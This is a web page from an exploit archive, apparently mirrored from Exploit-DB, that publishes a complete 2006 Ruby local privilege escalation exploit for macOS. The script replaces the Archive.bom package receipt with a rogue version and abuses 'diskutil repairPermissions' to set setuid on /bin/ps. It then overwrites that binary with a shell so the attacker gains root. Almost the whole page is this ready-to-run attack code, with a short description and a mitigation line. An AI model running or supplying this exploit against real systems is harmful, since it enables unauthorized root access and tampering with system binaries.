Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Ruby Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
by:
LMH, Kevin Finisterre
7.5
CVSS
HIGH
File Overwrite
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

Ruby Exploit

This is a Ruby exploit that overwrites a target binary with a shell path and sets rogue permissions. It is used to gain unauthorized access to a system.

Mitigation:

Ensure that the binary doesn't drop privileges and that proper permissions are set for the target binary.
Source

Exploit-DB raw data:

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
#          Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz"   - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#

require 'fileutils'

# Basic configuration
TARGET_BINARY       = "/bin/ps"   # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH  = "/tmp/ps2"  # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH   = "/usr/bin/id"  # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH     = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH       = "/usr/sbin/diskutil"
TEH_EVIL_BOM        = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
  puts "++ Repairing (moving back-ups to original path)"
  puts "++ #{File.basename(BOMARCHIVE_PATH)}"
  FileUtils.rm_f BOMARCHIVE_PATH
  FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH
  
  puts "++ #{TARGET_BINARY}"
  FileUtils.rm_f TARGET_BINARY
  FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY
  
  puts "++ Removing back-ups..."
  FileUtils.rm_f TARGET_BACKUP_PATH
  FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))
  
  puts "++ Done. Repairing disk permissions..."
  exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
  puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."

  # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
  # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
  # An alternative method is running diskutil again to set the rogue permissions.
  over = File.new(TARGET_BINARY, "w")
  over.write(File.read(TARGET_SHELL_PATH))
  over.close
  
  unless FileTest.setuid?(TARGET_BINARY)
    fork do
      FileUtils.rm_f TARGET_BINARY
      FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
      exec "#{DISKUTIL_PATH} repairPermissions /"
    end
    Process.wait
  end
  
  puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
  puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"
  
  # Back-up the original Archive.bom, set mode to 777
  if FileTest.writable?(BOMARCHIVE_PATH)
    backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))
    
    unless FileTest.exists?(backup_path)
      puts "++ Creating backup copy at #{backup_path}"
      FileUtils.cp BOMARCHIVE_PATH, backup_path
    end
  
    puts "++ Removing original file."
    FileUtils.rm_f BOMARCHIVE_PATH
    
    puts "++ Writing backdoor BOM file."
    target_bom = File.new(BOMARCHIVE_PATH, "w")
    target_bom.write(TEH_EVIL_BOM)
    target_bom.close
    puts "++ Done."
  else
    puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today."
    exit
  end
  
  # Back-up the target backdoor path
  unless FileTest.exists?(TARGET_BACKUP_PATH)
    puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
    FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
  end
  
  # Let diskutil do it's job (set permissions over target binary path, setuid)
  puts "++ Running diskutil to set the new permissions for the backdoor..."
  fork do
    exec "#{DISKUTIL_PATH} repairPermissions /"
  end
  Process.wait
  
  puts "++ Somebody set up us the bomb!"
  exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
  do_repair()
else
  set_up_the_bomb()
end

# milw0rm.com [2007-01-05]

Navigation

Suggest Exploit

Services By CQR